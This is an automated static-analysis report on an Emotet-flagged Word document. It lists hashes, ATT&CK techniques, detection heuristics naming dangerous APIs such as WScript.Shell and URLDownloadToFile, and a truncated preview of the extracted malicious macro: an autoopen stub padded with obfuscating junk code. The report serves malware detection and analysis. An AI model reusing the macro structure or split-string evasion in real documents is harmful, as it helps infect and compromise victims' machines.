Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 101bda0f1be52e9f…

MALICIOUS

Office (OLE)

Size: 139.0 KB · Created: 2019-05-30 07:59:00 · Authoring application: Microsoft Office Word · First seen: 2019-09-30
MD5: 1028bf84498a4e6ea70659ce00be1eb3
SHA-1: ce49aaf2b7882882f45f0907e610cc66bee7faf7
SHA-256: 101bda0f1be52e9f359fde71e23c1da7583d5804ee416dfa6a8f4bfbd697685a
Risk Score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample contains VBA macros, including an autoopen macro, which is a common Emotet infection vector. The script uses obfuscation techniques like splitting keywords and dynamically reassembling API names such as 'Win32_Process'. The presence of an autoopen macro and the CreateObject call strongly suggest the execution of a second-stage payload, likely a downloader. ClamAV also identifies this as Emotet.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-10001946-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-10001946-0
  • VBA macros detected [medium] (4 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals [critical] OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10268 bytes
SHA-256: 6fb34152e9a28d7b36d4a1ac433711d5c4eb440fc985bb464b15f5be6245d0af

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "V76DlAI, 0, 0, MSForms, ComboBox"
Attribute VB_Control = "q0jjlB, 1, 1, MSForms, ComboBox"
Attribute VB_Control = "IjYqSK, 2, 2, MSForms, ComboBox"
Function HBAIRjmS()
   'Select Case "VH8V3cdH"
        ' Case "PMiWkFI"
           ' Debug.Print  "JXhwVPWq"
           ' Debug.Print  "Urq4szh"
           ' Debug.Print  Tan("d3cWjwhT")
       '  Case "KQv3rA"
           ' Debug.Print  Log("QlFjwpuB")
          '  Debug.Print  "QwjDUND"
          '  Debug.Print  "AAAz8qkn"
'End Select
   'Select Case "tXqN6z"
        ' Case "ARja2S"
           ' Debug.Print  "q5XAVT"
           ' Debug.Print  "EHicT0"
           ' Debug.Print  Tan("fo0wtz7I")
       '  Case "AnYUMLa"
           ' Debug.Print  Log("SO3qjj")
          '  Debug.Print  "pOiwC6"
          '  Debug.Print  "KU9bB9Pl"
'End Select
End Function
Sub _
autoopen( _
)
   'Select Case "M7jj6l"
        ' Case "ZNJAmRQ"
           ' Debug.Print  "Or1icv8"
           ' Debug.Print  "piojj6"
           ' Debug.Print  Tan("G9W9iqQ")
       '  Case "BvqkGkU"
           ' Debug.Print  Log("hrmzKjzm")
          '  Debug.Print  "z9rPPJ"
          '  Debug.Print  "iYwAkE"
'End Select
pW15AUm8
   'Select Case "NYprTur"
        ' Case "Vm0TaW"
           ' Debug.Print  "zwEzzOh"
           ' Debug.Print  "IwwwOj"
           ' Debug.Print  Tan("iDt0kXZA")
       '  Case "TL_YJdr8"
           ' Debug.Print  Log("odKIZL")
          '  Debug.Print  "uULGRWvS"
          '  Debug.Print  "VYpwEfJ"
'End Select
End Sub
Function jSGRJXKM()
   'Select Case "R_MfLn"
        ' Case "XFcrMhXf"
           ' Debug.Print  "jHHjqhGR"
           ' Debug.Print  "L_vKfspl"
           ' Debug.Print  Tan("YViMCD")
       '  Case "mMzL6Dji"
           ' Debug.Print  Log("QpZ6cjwc")
          '  Debug.Print  "Ki4whE"
          '  Debug.Print  "d6hnOS"
'End Select
   'Select Case "jQq4XO"
        ' Case "FVok4qL"
           ' Debug.Print  "jMFVbUU"
           ' Debug.Print  "cFwWtTz"
           ' Debug.Print  Tan("GzvXJtU")
       '  Case "S6Vmj_M"
           ' Debug.Print  Log("r3O8VT8r")
          '  Debug.Print  "mmVwoOD"
          '  Debug.Print  "PDWBXu0"
'End Select
End Function


Attribute VB_Name = "acj6Q3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "L1GBjY"

Attribute VB_Name = "P7MZw5"

Attribute VB_Name = "bGTH6iV"

Attribute VB_Name = "cwlrOmD"

Attribute VB_Name = "z7qr4O"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "PAHD56"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "KTqMUs"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "ouH3it"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB
... (truncated)